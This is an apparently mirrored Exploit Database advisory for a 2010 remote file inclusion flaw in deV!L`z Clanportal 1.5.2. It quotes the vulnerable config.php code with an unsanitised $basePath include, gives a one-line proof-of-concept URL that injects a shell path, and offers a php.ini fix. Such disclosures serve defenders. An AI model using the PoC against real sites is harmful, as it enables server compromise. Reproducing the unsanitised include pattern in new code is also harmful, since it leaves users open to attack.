DZCP (deV!L`z Clanportal) 1.5.2 – Remote File Inclusion

Exploit Database
10 阅读

作者： cr4wl3r

日期： 2010-03-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11735/

[+]deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: http://www.dzcp.de/downloads/?action=download&id=131
[x] Code in [dzcp1.5.2/inc/config.php]

## REQUIRES ##
require_once($basePath."/inc/mysql.php");<--- RFI

function show($tpl, $array)
{
global $tmpdir;
$template = "../inc/_templates_/".$tmpdir."/".$tpl;

if($fp = @fopen($template.".".html, "r"))
$tpl = @fread($fp, filesize($template.".".html));

$array['dir'] = '../inc/_templates_/'.$tmpdir;
foreach($array as $value => $code)
{
$tpl = str_replace('['.$value.']', $code, $tpl);
}
return $tpl;
}

[+] PoC: [path]/inc/config.php?basePath=[Shell]

[+] Solution: Change php.ini and set allow_url_fopen to Off

last Exploits
DZCP (deV!L`z Clanportal) 1.5.2 – Remote File Inclusion的更多信息

Pandora FMS 3.1 – Authentication Bypass：
Joomla! Component com_jigsaw – ‘Controller’ Directory Traversal：
PlaySms 0.9.5.2 – Remote File Inclusion：
NGO Directory Script – SQL Injection：
Syslog LogAnalyzer 3.6.5 – Persistent Cross-Site Scripting：
CyberPower Systems PowerPanel 3.1.2 – XML External Entity Out-Of-Band Data Retrieval：
SolarWinds Orion Network Performance Monitor 10.2.2 – Multiple Vulnerabilities：
Joomla! Component JomWALL 4.0 – ‘wuid’ SQL Injection：